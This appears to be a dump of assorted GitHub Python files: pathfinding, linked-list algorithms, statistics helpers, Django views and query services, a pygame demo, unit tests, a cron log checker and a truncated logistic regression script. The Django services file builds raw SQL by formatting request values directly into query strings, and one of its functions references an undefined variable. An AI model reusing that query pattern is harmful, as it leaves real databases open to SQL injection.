yC) > 0.2:\n r = x_list.index(i)\n x_list.pop(r)\n continue\n \n loc = self.dict[i].index(yCI)\n if loc > 0 and loc < len(self.dict[i]) - 1:\n y_list = [self.dict[i][loc - 1], self.dict[i][loc], self.dict[i][loc + 1]]\n elif loc == 0 and len(self.dict[i]) >= 2:\n y_list = [self.dict[i][loc], self.dict[i][loc + 1]]\n elif loc == 0 and len(self.dict[i]) < 2:\n y_list = [self.dict[i][loc]]\n elif loc == len(self.dict[i]) -1:\n y_list = [self.dict[i][loc - 1], self.dict[i][loc]]\n \n y_list = self.neighborClean(y_list, self.dict[i][loc])\n y_all.extend(y_list)\n # print(i, y_list)\n neighborList = [self.arrayCord((j, k)) for j in x_list for k in set((y_all))]\n \n neighborSet = set((neighborList))\n # print((xC, yC) in neighborSet)\n return neighborSet\n\n def hVal(self): \n neighbors_list = self.neighbors(self.pathList[-1])\n # print(neighbors_list)\n h_dict = {}\n for i in neighbors_list:\n dist = self.euclidean(i, self.goal)\n h_dict[i] = dist\n # print(i, self.euclidean(i))\n while True:\n cord = min(h_dict.keys(), key=(lambda k: h_dict[k]))\n if self.pathVerify(cord):\n break\n else:\n h_dict.pop(cord)\n\n self.pathDict[self.g] = cord\n self.pathList.append(cord)\n\n return h_dict[cord]\n\n def pathCalc(self):\n self.g += 1\n self.h = self.hVal()\n self.f = self.g + self.h\n if self.h == 0:\n # print(self.h)\n return False\n elif self.g > 1:\n if self.pathDict[self.g] == self.pathDict[self.g-2]:\n print(\"Repetation\")\n return False\n\n return True\n\ndef findPath(img_path, 
file_path, start, goal):\n \n path = A_Star(file_path, start, goal)\n\n flag = True\n while flag:\n flag = path.pathCalc()\n\n img = cv2.imread(img_path)\n # print(path.pathDict)\n\n for i in path.pathDict.values():\n cv2.circle(img, i, 5, (0, 250, 255), 10)\n\n for i in (path.arrayCord(start), path.arrayCord(goal)):\n cv2.putText(\n img, #numpy array on which text is written\n str(i), #text\n i, #position at which writing has to start\n cv2.FONT_HERSHEY_SIMPLEX, #font family\n 1, #font size\n (255, 255, 255, 255), #font color\n 1)\n\n cv2.circle(img, start, 5, (0, 250, 0), 10)\n cv2.circle(img, goal, 5, (0, 0, 255), 10)\n\n cv2.imshow(\"image\", img)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n cv2.imwrite(r'Pics\\Output_F1.png', img)\n\n return path.pathDict\n\nif __name__ == '__main__':\n\n img = r'GitFiles\\FlipKart_Nav\\Pics\\Blank_1.png'\n file = r'GitFiles\\FlipKart_Nav\\Files\\Co-ordinates_1.csv'\n inp_1 = (200, 800)\n inp_2 = (850, 105)\n\n \n findPath(img, file, inp_1, inp_2)\n ","repo_name":"Samar2173/FlipKart_Nav","sub_path":"Code/astar_cv2_diagonals.py","file_name":"astar_cv2_diagonals.py","file_ext":"py","file_size_in_byte":7494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"36142724893","text":"'''\nkeys:\nSolutions:\nSimilar:\nT:\nS:\n'''\nfrom typing import List\n\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution:\n ##### TODO: educative.io version, need to calculate the distance\n def detectCycle3(self, head):\n cycle_len = 0\n slow, fast = head, head\n while fast and fast.next:\n slow = slow.next\n fast = fast.next.next\n if slow == fast:\n cycle_len = self.cycle_len_cal(slow)\n break\n return self.find_start(head, cycle_len)\n\n def cycle_len_cal(self, slow):\n # calculate the length of the cycle\n cur = slow\n len_ = 0\n while True:\n cur = cur.next\n len_ += 1\n if cur == slow:\n break\n return len_\n\n def find_start(self, head, cycle_len):\n pt1, pt2 = head, head\n while cycle_len > 0:\n pt2 = pt2.next\n cycle_len -= 1\n while pt1 != pt2:\n pt1 = pt1.next\n pt2 = pt2.next\n return pt1\n\n\n\n # The method to go...\n ##### TODO: two pointer (fast and slow)\n # O(1) for S and O(n) for T\n def getIntersect(self, head):\n slow = head\n fast = head\n\n # A fast pointer will either loop around a cycle and meet the slow\n # pointer or reach the `null` at the end of a non-cyclic list.\n while fast and fast.next:\n slow = slow.next\n fast = fast.next.next\n if slow == fast:\n return slow\n\n return None\n\n def detectCycle1(self, head):\n if head is None:\n return None\n\n # If there is a cycle, the fast/slow pointers will intersect at some\n # node. Otherwise, there is no cycle, so we cannot find an entrance to\n # a cycle. \n intersect = self.getIntersect(head)\n if intersect is None:\n return None\n\n # To find the entrance to the cycle, we have two pointers traverse at\n # the same speed -- one from the front of the list, and the other from\n # the point of intersection. 
When they intersect, the point is the entrance\n ptr1 = head\n ptr2 = intersect\n while ptr1 != ptr2:\n ptr1 = ptr1.next\n ptr2 = ptr2.next\n\n return ptr1\n\n\n ##### TODO: hashset\n # O(n) for S and T\n def detectCycle(self, head: ListNode) -> ListNode:\n visited = set()\n node = head\n while node is not None:\n if node in visited:\n return node\n else:\n visited.add(node)\n node = node.next\n return node\n\n\n\n ##### TODO: improved pointer (fast and slow)\n # this is hard to think of \n # O(1) for S and O(n) for T\n def detectCycle2(self, head):\n slow = head; fast = head\n while fast is not None and fast.next is not None:\n fast = fast.next.next\n slow = slow.next\n if fast == slow:\n while slow != head:\n slow = slow.next # it's actually the originial fast pointer\n head = head.next # it's the head\n return slow\n return None\n\n\n \n\n\n\n","repo_name":"qinzhouhit/leetcode","sub_path":"fast_slow_pointers/142detectCycle.py","file_name":"142detectCycle.py","file_ext":"py","file_size_in_byte":3284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"28633382756","text":"import numpy as np\nimport pandas as pd\nimport patsy\nfrom collections import OrderedDict\n\ndef design_matrix(formula, data):\n \"\"\"\n Build the design matrix t-contrasts and F-contrasts given the formula and the dataframe.\n Remark: use `patsy.dmatrix(formula, data=data)`\n\n Parameters\n ----------\n formula, str\n data, DataFrame\n\n Returns\n -------\n X: array\n the design matrix\n t_contrasts: OrderedDict key=colname, val=array (P,)\n remark: len(t_contrasts) == X.shape[1]\n f_contrasts: OrderedDict key=term name in formula, val=array (P, P)\n not documented.\n \"\"\"\n # Build design matrix\n dmat = patsy.dmatrix(formula, data=data)\n\n # Build T-contrasts\n t_contrasts = OrderedDict()\n\n for idx, name in enumerate(dmat.design_info.column_names):\n cont = np.zeros(dmat.shape[1])\n cont[idx] = 1\n t_contrasts[name] = cont\n\n # Build F-contrasts\n f_contrasts = OrderedDict()\n\n for term, slice in dmat.design_info.term_name_slices.items():\n # if term == \"site\":\n # break\n cont = np.zeros((dmat.shape[1], dmat.shape[1]))\n indices = np.arange(slice.start, slice.stop)\n cont[indices, indices] = 1\n f_contrasts[term] = cont\n\n return np.asarray(dmat), t_contrasts, f_contrasts\n","repo_name":"neurospin/pylearn-mulm","sub_path":"mulm/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"29"} +{"seq_id":"6867401253","text":"\"\"\"\nThis module provide functions to balance data.\n\"\"\"\nimport numpy\n\n\ndef balance_data(x, y):\n \"\"\"\n Balance data to be representative.\n\n Note: When balancing the data, the number os data and labels tends to\n decrease because the extra instances of some classes will be removed.\n\n :param x:\n Data or paths.\n :param y:\n Labels/classes.\n\n :return: tuple (numpy.ndarray, numpy.ndarray)\n x, y balanced\n \"\"\"\n dataset = list(zip(x, y))\n unique, counts = numpy.unique(y, return_counts=True)\n max_n_instances = min(counts)\n paths_per_label = dict()\n for label in unique:\n paths_per_label[label] = list(filter(lambda d: d[1] == label, dataset))\n x = []\n y = []\n for label in paths_per_label:\n for inst, lbl in paths_per_label[label][:max_n_instances]:\n x.append(inst)\n y.append(lbl)\n\n return numpy.asarray(x), 
numpy.asarray(y)\n","repo_name":"ajilim/spoken-language-identification","sub_path":"util/datasets/balance.py","file_name":"balance.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"25008771847","text":"from django.db import connection\nfrom .models import Group, Album, Track\n\ndef get_groups(**params):\n group_uuids = params.get('group_uuids', None)\n genre_uuids = params.get('genre_uuids', None)\n\n sql_query = \"select g.* from groups as g\"\n if group_uuids and genre_uuids:\n group_uuids = map(lambda s: \"'{}'\".format(s), group_uuids)\n genre_uuids = map(lambda s: \"'{}'\".format(s), genre_uuids)\n sql_query += ' where g.group_uuid in ({}) and g.genre in ({})'. \\\n format(','.join(group_uuids), ','.join(genre_uuids))\n elif group_uuids:\n group_uuids = map(lambda s: \"'{}'\".format(s), group_uuids)\n sql_query += ' where g.group_uuid in ({})'. \\\n format(','.join(group_uuids))\n elif genre_uuids:\n genre_uuids = map(lambda s: \"'{}'\".format(s), genre_uuids)\n sql_query += ' where g.genre in ({})'. \\\n format(','.join(genre_uuids))\n sql_query += ';'\n group_list = Group.objects.raw(sql_query)\n\n return group_list\n\ndef get_albums(**params):\n album_uuids = params.get('album_uuids', None)\n genre_uuids = params.get('genre_uuids', None)\n group_uuids = params.get('group_uuids', None)\n\n sql_query = \"select a.* from albums as a\"\n if album_uuids and genre_uuids:\n album_uuids = map(lambda s: \"'{}'\".format(s), album_uuids)\n genre_uuids = map(lambda s: \"'{}'\".format(s), genre_uuids)\n sql_query += ' where a.album_uuid in ({}) and a.genre in ({})'. \\\n format(','.join(album_uuids), ','.join(genre_uuids))\n elif album_uuids:\n album_uuids = map(lambda s: \"'{}'\".format(s), album_uuids)\n sql_query += ' where a.album_uuid in ({})'. \\\n format(','.join(album_uuids))\n elif genre_uuids:\n genre_uuids = map(lambda s: \"'{}'\".format(s), genre_uuids)\n sql_query += ' where a.genre in ({})'. \\\n format(','.join(genre_uuids))\n elif group_uuids:\n group_uuids = map(lambda s: \"'{}'\".format(s), group_uuids)\n sql_query += ' where a.album_group in ({})'. \\\n format(','.join(group_uuids))\n sql_query += ';'\n album_list = Album.objects.raw(sql_query)\n\n return album_list\n\ndef get_tracks(**params):\n tracks_uuids = params.get('tracks_uuids', None)\n albums_uuids = params.get('albums_uuids', None)\n sql_query = \"select t.* from tracks as t\"\n if tracks_uuids and albums_uuids:\n tracks_uuids = map(lambda s: \"'{}'\".format(s), tracks_uuids)\n albums_uuids = map(lambda s: \"'{}'\".format(s), albums_uuids)\n sql_query += ' where t.track_uuid in ({}) and t.album in ({})'. \\\n format(','.join(album_uuids), ','.join(tracks_uuids))\n elif tracks_uuids:\n tracks_uuids = map(lambda s: \"'{}'\".format(s), tracks_uuids)\n sql_query += ' where t.track_uuid in ({})'. \\\n format(','.join(tracks_uuids))\n elif albums_uuids:\n albums_uuids = map(lambda s: \"'{}'\".format(s), albums_uuids)\n sql_query += ' where t.album in ({})'. 
\\\n format(','.join(albums_uuids))\n sql_query += ';'\n track_list = Track.objects.raw(sql_query)\n\n return track_list","repo_name":"and227/musexplorer-back","sub_path":"src/apps/muzservice/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":3100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"16886871062","text":"from django.shortcuts import render, redirect, get_object_or_404\n\nfrom .models import Blog\nfrom .forms import NewBlogForm, UpdateBlogForm, DeleteBlogForm\n\n\ndef index(request):\n blogs = Blog.objects.all()\n context = {'blogs': blogs}\n return render(request, 'blogs/index.html', context=context)\n\n\ndef details(req, id):\n blog = get_object_or_404(Blog, id=id)\n context = {'blog': blog}\n return render(req, 'blogs/details.html', context=context)\n\n\ndef add_blog(req):\n if req.method == 'POST':\n posted_form = NewBlogForm(req.POST)\n if posted_form.is_valid():\n posted_form.save()\n return redirect('/')\n\n new_form = NewBlogForm()\n return render(req, 'blogs/addBlog.html', {'form': new_form})\n\n\ndef delete_blog(req):\n if req.method == 'POST':\n delete_form = DeleteBlogForm(req.POST)\n if delete_form.is_valid():\n id = delete_form.data.get('id')\n blog = get_object_or_404(Blog, id=id)\n blog.delete()\n return redirect('/')\n\n\ndef update_blog(req, id):\n if req.method == 'POST':\n oldBlog = Blog.objects.get(id=id)\n\n setattr(oldBlog, 'title', req.POST.get('title'))\n setattr(oldBlog, 'author', req.POST.get('author'))\n setattr(oldBlog, 'body', req.POST.get('body'))\n oldBlog.save()\n\n return redirect('/')\n\n updateBlog = Blog.objects.get(id=id)\n context = {'blog': updateBlog}\n return render(req, 'blogs/updateBlog.html', context=context)\n","repo_name":"AluBhorta/django-intro","sub_path":"blogs/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"39277024283","text":"#!/usr/bin/python3\ndef safe_print_list(my_list=[], x=0):\n if not my_list or x == 0:\n print()\n return (0)\n try:\n for idx in range(x):\n print(my_list[idx], end=\"\")\n except:\n idx = idx - 1\n finally:\n print()\n return(idx + 1)\n","repo_name":"LDoualito/holbertonschool-higher_level_programming","sub_path":"0x05-python-exceptions/0-safe_print_list.py","file_name":"0-safe_print_list.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"29820985557","text":"score = [0, 0]\nfor _ in range(int(input())):\n a, b = map(int, input().split())\n if a > b:\n score[0] += (a + b)\n elif a < b:\n score[1] += (a + b)\n else:\n score[0] += a\n score[1] += b\nprint(score[0], score[1])","repo_name":"ppirae/BOJ","sub_path":"prob_1000~9999/5607_問題 1.py","file_name":"5607_問題 1.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"4257740710","text":"import pygame\nimport time\n\npygame.init()\nrun = True\n# window setup\nwin = pygame.display.set_mode((500, 500))\nscreen_width = 500\n# window name\npygame.display.set_caption(\"Enemy Testing Grounds\")\nclock = pygame.time.Clock()\nwalkCount = 0\n\nwalkRight = [pygame.image.load('R1.png'), pygame.image.load('R2.png'), pygame.image.load('R3.png'),\n pygame.image.load('R4.png'), pygame.image.load('R5.png'), pygame.image.load('R6.png'),\n 
pygame.image.load('R7.png'), pygame.image.load('R8.png'), pygame.image.load('R9.png')]\nwalkLeft = [pygame.image.load('L1.png'), pygame.image.load('L2.png'), pygame.image.load('L3.png'),\n pygame.image.load('L4.png'), pygame.image.load('L5.png'), pygame.image.load('L6.png'),\n pygame.image.load('L7.png'), pygame.image.load('L8.png'), pygame.image.load('L9.png')]\nbg = pygame.image.load('bg.jpg')\nchar = pygame.image.load('standing.png')\n\nclock = pygame.time.Clock()\n\nscore = 0\n\nbulletSound = pygame.mixer.Sound('bulletS.wav')\nhitSound = pygame.mixer.Sound('hitS.wav')\nmusic = pygame.mixer.music.load('music.mp3')\n#pygame.mixer.music.play(-1)\n\nclass player(object):\n # characters location and values\n def __init__(self, x, y, width, height):\n self.x = x\n self.y = y\n self.width = width\n self.height = height\n self.walkCount = 0\n self.vel = 3\n self.isJump = False\n self.left = False\n self.right = False\n self.jumpCount = 10\n self.standing = True\n self.hitbox = (self.x + 17, self.y + 11, 29, 52)\n self.score = score\n\n def draw(self, win):\n if self.walkCount + 1 >= 27:\n self.walkCount = 0\n if self.y > 410:\n self.y = 410\n if not (self.standing):\n if self.left:\n win.blit(walkLeft[self.walkCount // 3], (self.x, self.y))\n self.walkCount += 1\n elif self.right:\n win.blit(walkRight[self.walkCount // 3], (self.x, self.y))\n self.walkCount += 1\n else:\n if self.right:\n win.blit(walkRight[0], (self.x, self.y))\n else:\n win.blit(walkLeft[0], (self.x, self.y))\n self.hitbox = (self.x + 17, self.y + 11, 29, 52)\n pygame.draw.rect(win, (255, 0, 0), self.hitbox, 2)\n def hit(self):\n self.y = 410\n self.x = 60\n self.walkCount = 0\n font1 = pygame.font.SysFont('comicsans', 30)\n text = font1.render('Hit', 1, (100, 22, 117))\n win.blit(text, (self.x, self.y+10))\n pygame.display.update()\n i = 0\n while i < 100:\n pygame.time.delay(10)\n i += 1\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n i = 301\n pygame.quit()\nclass enemy(object):\n enemyR = [pygame.image.load('R1E.png'), pygame.image.load('R2E.png'), pygame.image.load('R3E.png'),\n pygame.image.load('R4E.png'), pygame.image.load('R5E.png'), pygame.image.load('R6E.png'),\n pygame.image.load('R7E.png'), pygame.image.load('R8E.png')]\n enemyL = [pygame.image.load('L1E.png'), pygame.image.load('L2E.png'), pygame.image.load('L3E.png'),\n pygame.image.load('L4E.png'), pygame.image.load('L5E.png'), pygame.image.load('L6E.png'),\n pygame.image.load('L7E.png'), pygame.image.load('L8E.png')]\n enemyRattack = [pygame.image.load('R9E.png'), pygame.image.load('R10E.png'), pygame.image.load('R11E.png')]\n enemyLattack = [pygame.image.load('L9E.png'), pygame.image.load('L10E.png'), pygame.image.load('L11E.png')]\n\n def __init__(self, startx, y, width, height, end, isalive):\n self.alive = isalive\n self.start = startx\n self.x = startx\n self.y = y\n self.width = width\n self.height = height\n self.end = end\n self.path = [self.start, self.end]\n self.walkCount = 0\n self.vel = 3\n self.hitbox = (self.x + 17, self.y + 2, 31, 57)\n self.tod = 0\n self.health = 12\n\n\n\n def draw(self, win):\n if self.alive == True:\n self.move()\n pygame.draw.line(win, (0, 0, 255), (0, 0), (639, 479))\n if self.walkCount >= 16:\n self.walkCount = 0\n if self.vel > 0:\n win.blit(self.enemyR[self.walkCount // 4], (self.x, self.y))\n self.walkCount += 1\n else:\n win.blit(self.enemyL[self.walkCount // 4], (self.x, self.y))\n self.walkCount += 1\n pygame.draw.rect(win, (255, 0, 0), (self.hitbox[0], self.hitbox[1] - 20, 50, 10))\n 
pygame.draw.rect(win, (0, 128, 0), (self.hitbox[0], self.hitbox[1] - 20, 50 - (5 * (10 - self.health)), 10))\n #https://www.techwithtim.net/tutorials/game-development-with-python/pygame-tutorial/scoring-health-bars/\n self.hitbox = (self.x + 17, self.y + 2, 31, 57)\n pygame.draw.rect(win, (100, 22, 117), self.hitbox, 2)\n else:\n self.hitbox = (0,0,0,0)\n\n\n def move(self):\n self.x += self.vel\n if self.x < self.start:\n self.x = self.start\n self.walkCount = 0\n if self.x > self.end:\n self.x = self.end\n self.walkCount = 0\n if man.x >= self.path[0] and man.x <= self.path[1]:\n if man.x <= self.x and man.y == self.y:\n #print(\"moving left\")\n if self.vel > 0:\n self.vel = self.vel * -1\n\n elif man.x >= self.x and man.y == self.y:\n #print(\"moving right\")\n if self.vel < 0:\n self.vel = self.vel * -1\n\n else:\n self.walkPath()\n def walkPath(self):\n #print(\"Patrolling\")\n if self.x >= self.path[1]:\n self.vel = self.vel * -1\n self.walkCount = 0\n elif self.x == self.path[0]:\n self.vel = self.vel*-1\n self.walkCount = 0\n def attack(self):\n if man.x < self.x:\n win.blit(self.enemyL[self.walkCount // 4], (self.x, self.y))\n else:\n win.blit(self.enemyRattack[self.walkCount // 4], (self.x, self.y))\n def hit(self):\n #print(\"Hit\")\n hitSound.play()\n self.health -= 4\n print(self.health)\n if(self.health <= 0):\n self.alive = False\n self.ressurect()\n def ressurect(self):\n print(\"Beginning Necromancy\")\n self.currentTime = pygame.time.get_ticks()\n self.passedTime = self.currentTime - self.tod\n print(self.tod)\n print(self.passedTime)\n print(self.currentTime)\n if(self.passedTime >= 5000): # resurrect once at least 5 seconds have elapsed since time of death\n print(self.passedTime)\n print(\"He is reborn\")\n self.alive = True\n\nclass projectile(object):\n def __init__(self, x, y, radius, color, facing):\n self.x = x\n self.y = y\n self.radius = radius\n self.color = color\n self.facing = facing\n self.vel = 8 * facing\n\n def draw(self, win):\n pygame.draw.circle(win, self.color, (self.x, self.y), self.radius)\n\ndef writeScore():\n font1 = pygame.font.SysFont('comicsans', 30)\n scoreOut = font1.render(\"Score: \" + str(score), 1, (100, 22, 117))\n win.blit(scoreOut, (50,150))\n\ndef redrawGameWindow():\n win.blit(bg, (0, 0))\n man.draw(win)\n goblin.draw(win)\n writeScore()\n for bullet in bullets:\n bullet.draw(win)\n\n pygame.display.update()\n\n\n# mainloop\nman = player(50, 410, 64, 64)\ngoblin = enemy(100, 410, 64, 64, 450, True)\nshootLoop = 0\nbullets = []\nrun = True\nwhile run:\n clock.tick(27)\n\n if man.hitbox[1] < goblin.hitbox[1] + goblin.hitbox[3] and man.hitbox[1] + man.hitbox[3] > goblin.hitbox[1]:\n if man.hitbox[0] + man.hitbox[2] > goblin.hitbox[0] and man.hitbox[0] < goblin.hitbox[0] + goblin.hitbox[2]:\n man.hit()\n goblin.health = 12\n writeScore()\n score -= 2\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n\n if shootLoop > 0:\n shootLoop += 1\n if shootLoop > 3:\n shootLoop = 0\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n\n for bullet in bullets:\n if bullet.y - bullet.radius < goblin.hitbox[1] + goblin.hitbox[3] and bullet.y + bullet.radius > goblin.hitbox[1]:\n if bullet.x + bullet.radius > goblin.hitbox[0] and bullet.x - bullet.radius < goblin.hitbox[0] + \\\n goblin.hitbox[2]:\n goblin.hit()\n goblin.tod = pygame.time.get_ticks()\n score += 3\n bullets.pop(bullets.index(bullet))\n\n if bullet.x < 500 and bullet.x > 0:\n bullet.x += bullet.vel\n else:\n bullets.pop(bullets.index(bullet))\n\n keys = 
pygame.key.get_pressed()\n\n if keys[pygame.K_SPACE] and shootLoop == 0:\n bulletSound.play()\n if man.left:\n facing = -1\n else:\n facing = 1\n\n if len(bullets) < 2:\n bullets.append(\n projectile(round(man.x + man.width // 2), round(man.y + man.height // 2), 6, (0, 0, 0), facing))\n\n shootLoop = 1\n if keys[pygame.K_LEFT] and man.x > man.vel:\n man.x -= man.vel\n man.left = True\n man.right = False\n man.standing = False\n elif keys[pygame.K_RIGHT] and man.x < 500 - man.width - man.vel:\n man.x += man.vel\n man.right = True\n man.left = False\n man.standing = False\n else:\n man.standing = True\n man.walkCount = 0\n\n if not man.isJump:\n if keys[pygame.K_UP]:\n man.isJump = True\n man.right = False\n man.left = False\n man.walkCount = 0\n else:\n if man.jumpCount >= -10:\n neg = 1\n if man.jumpCount < 0:\n neg = -1\n man.y -= (man.jumpCount ** 2) * 0.5 * neg\n man.jumpCount -= 1\n else:\n man.isJump = False\n man.jumpCount = 10\n redrawGameWindow()\n\npygame.quit()\n","repo_name":"rileymize1/SoftEngGameProjSp2021","sub_path":"Enemy playground.py","file_name":"Enemy playground.py","file_ext":"py","file_size_in_byte":10184,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"43519649635","text":"from project.student_report_card import StudentReportCard\nfrom unittest import TestCase, main\n\n\nclass TestStudent(TestCase):\n\n def setUp(self):\n self.student = StudentReportCard(\"Tamer\", 12)\n\n def test_successful_year(self):\n self.student.school_year = 1\n\n self.assertEqual(1, self.student.school_year)\n\n def test_successful_initialization(self):\n self.assertEqual(\"Tamer\", self.student.student_name)\n self.assertEqual(12, self.student.school_year)\n self.assertEqual({}, self.student.grades_by_subject)\n\n def test_for_error_with_empty_student_name(self):\n with self.assertRaises(ValueError) as ve:\n self.student.student_name = \"\"\n self.assertEqual(\"Student Name cannot be an empty string!\", str(ve.exception))\n\n def test_for_error_with_wrong_school_year(self):\n with self.assertRaises(ValueError) as ve:\n self.student.school_year = 13\n self.assertEqual(\"School Year must be between 1 and 12!\", str(ve.exception))\n\n def test_successful_add_grade(self):\n subject = \"123\"\n grade = 6.00\n self.student.add_grade(subject, grade)\n self.assertEqual({\"123\": [6.00]}, self.student.grades_by_subject)\n self.student.add_grade(subject, grade)\n self.assertEqual({\"123\": [6.00, 6.00]}, self.student.grades_by_subject)\n self.student.add_grade(\"456\", 6.00)\n self.assertEqual({\"123\": [6.00, 6.00], \"456\": [6.00]}, self.student.grades_by_subject)\n\n def test_average_grade_by_subject(self):\n self.student.add_grade(\"123\", 6.00)\n self.student.add_grade(\"456\", 6.00)\n self.student.add_grade(\"789\", 6.00)\n self.assertEqual([6.00], self.student.grades_by_subject[\"123\"])\n self.assertEqual([6.00], self.student.grades_by_subject[\"456\"])\n self.assertEqual([6.00], self.student.grades_by_subject[\"789\"])\n self.assertEqual(1, len(self.student.grades_by_subject[\"123\"]))\n self.assertEqual(\"123: 6.00\\n\"\n \"456: 6.00\\n\"\n \"789: 6.00\", self.student.average_grade_by_subject())\n\n def test_empty_report_average_grade(self):\n self.assertEqual(\"\", self.student.average_grade_by_subject())\n\n def test_average_grade_for_all_subjects(self):\n self.student.add_grade(\"123\", 6.00)\n self.student.add_grade(\"456\", 6.00)\n actual = self.student.average_grade_for_all_subjects()\n expected = \"Average Grade: 6.00\"\n 
self.assertEqual(expected, actual)\n self.assertEqual([6.00], self.student.grades_by_subject[\"123\"])\n self.assertEqual([6.00], self.student.grades_by_subject[\"456\"])\n self.assertEqual(1, len(self.student.grades_by_subject[\"123\"]))\n\n def test_repr(self):\n self.student.add_grade(\"P - Basic\", 6.00)\n self.student.add_grade(\"P - Basic\", 6.00)\n self.student.add_grade(\"P - Fund\", 6.00)\n\n result = self.student.__repr__()\n\n self.assertEqual(\"Name: Tamer\\n\"\n \"Year: 12\\n\"\n \"----------\\n\"\n f\"{self.student.average_grade_by_subject()}\\n\"\n \"----------\\n\"\n f\"{self.student.average_grade_for_all_subjects()}\", result)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"kumchovylcho/softuni","sub_path":"Advanced - Python/Python OOP - Exams/Python OOP Retake Exam - 22 Aug 2020/project_test/project/test/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3312,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"5"} +{"seq_id":"6682405061","text":"#!/usr/bin/env python3\n\n\"\"\"\nWrite a script that checks the system log file and reports if there are any\ncron jobs that are not run by root. The script should report the username of\nthe cron job and the command that is run by the cron job. The script should\nreport if there are no cron jobs that are not run by root.\n\n\"\"\"\n\n\nimport re\nimport sys\n\nlogfile = sys.argv[1]\nusernames = []\nwith open(logfile) as f:\n for line in f:\n if \"CRON\" not in line:\n continue\n pattern = r\"USER \\((\\w+)\\)$\"\n result = re.search(pattern, line)\n if result is None:\n continue\n name = result[1]\n if name != \"root\":\n usernames.append(name)\n \nprint(usernames)\n \n# Path: Interacción con PC\\check_cron.py\n\n","repo_name":"Alphonsus411/Proyectos-Python","sub_path":"Interacción con PC/check_cron.py","file_name":"check_cron.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"18988576807","text":"import pytest\nfrom common.utils import partition_list\n\n\n@pytest.mark.parametrize(\n \"iterable,chunk_size,expected\",\n [\n ([1, 2, 3, 4, 5], 2, [[1, 2], [3, 4], [5]]),\n ([1, 2, 3, 4], 2, [[1, 2], [3, 4]]),\n ([1, 2], 3, [[1, 2]]),\n ],\n)\ndef test_partition_list(client, iterable, chunk_size, expected) -> None:\n assert list(partition_list(iterable, chunk_size)) == expected\n","repo_name":"r2r2/strana_backend","sub_path":"cabinet/old_tests/unittests/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"10005752205","text":"# distances is a 2D list whose inner-list index corresponds to the worker ID; each inner list is sorted by the distance between that worker and every bike, in descending order.\n# A second sorting step then pops the smallest distance for each worker and places it on a heap. 
\n# The above distances list is still useful in that whenever we have a conflict for a user, we can find the next best option for the current user.\nclass Solution:\n def assignBikes(self, workers: List[List[int]], bikes: List[List[int]]) -> List[int]:\n # get the minimum distance from each worker to each bike\n W = len(workers)\n B = len(bikes)\n distances = []\n \n for i in range(W):\n distances.append([])\n for j in range(B):\n m_distance = abs(bikes[j][0] - workers[i][0]) + abs(bikes[j][1] - workers[i][1])\n distances[-1].append((m_distance, i, j))\n distances[-1].sort(reverse=True)\n\n \n min_distances = [distances[i].pop() for i in range(W)]\n \n # use heap to assign bikes to the workers\n heapq.heapify(min_distances) # Please don't forget to heapify the list first before operating the heap methods\n assigned_bikes = set()\n ans = [0] * W\n \n while len(assigned_bikes) < W:\n smallest_dis, worker, bike = heapq.heappop(min_distances)\n\n if bike not in assigned_bikes:\n assigned_bikes.add(bike)\n ans[worker] = bike\n else:\n heapq.heappush(min_distances, distances[worker].pop())\n \n return ans\n ","repo_name":"Pennylele/Algorithms-fun-daily","sub_path":"1057.py","file_name":"1057.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"3310748393","text":"# -*- coding: utf-8 -*-\r\n\r\nimport numpy as np\r\n\r\ndef load_data(filepath):\r\n \"\"\"\r\n Load data.\r\n Revised codes and the data are from Machine Learning in Action.\r\n \"\"\"\r\n X = []\r\n Y = []\r\n with open(file=filepath, mode='r') as input:\r\n for line in input.readlines():\r\n x1_x2_y = line.strip().split()\r\n X.append([x1_x2_y[0], x1_x2_y[1]])\r\n Y.append(int(x1_x2_y[2]))\r\n return np.array(X, dtype=np.float32), np.array(Y, dtype=np.float32)\r\n\r\n\r\ndef sigmoid(z):\r\n \"\"\"\r\n sigmoid / logistic function (i.e., activation)\r\n compute the sigmoid of z element-wise\r\n np.exp is preferable to math.exp:\r\n - the parameter z is often a vector or a matrix, and np.exp can compute them element-wise\r\n \"\"\"\r\n return 1.0 / (1.0 + np.exp(-z))\r\n\r\ndef gradient_descent(X, Y, nx, ny, m, num_iterations, alpha):\r\n \"\"\"\r\n Gradient descent to train parameters.\r\n \"\"\"\r\n W = np.zeros(shape=(nx, 1), dtype=np.float32) # weights initialization\r\n b = 0.0 # bias initialization\r\n for i in 